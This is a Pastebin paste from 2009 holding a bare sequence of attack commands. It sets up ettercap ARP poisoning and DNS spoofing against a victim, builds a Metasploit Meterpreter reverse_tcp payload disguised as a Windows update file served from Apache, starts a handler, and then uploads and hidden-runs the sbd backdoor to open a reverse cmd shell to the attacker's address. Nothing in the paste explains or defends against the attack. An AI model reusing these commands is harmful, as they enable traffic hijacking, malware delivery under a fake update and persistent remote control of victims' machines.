Advertisement
Guest User

g0tmi1k

a guest
Jul 4th, 2009
1,311
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.57 KB | None | 0 0
  1. cd /usr/share/ettercap/
  2. cp etter.dns etter.dns.old
  3. kwrite /usr/share/ettercap/etter.dns
  4.  
  5. sh -c "start-apache"
  6.  
  7. cd /pentest/exploits/framework3
  8. ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 X > /var/www/Windows-KB174529-x86-ENU.exe
  9. ./msfconsole
  10. use exploit/multi/handler
  11. set PAYLOAD windows/meterpreter/reverse_tcp
  12. set LHOST 192.168.1.104
  13. exploit
  14.  
  15. ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.1.1/ /192.168.1.101/
  16.  
  17. upload /root/tools/backdoors/sbd-1.36/sbd.exe C:/
  18. execute -H -f "C:/sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 192.168.1.104"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement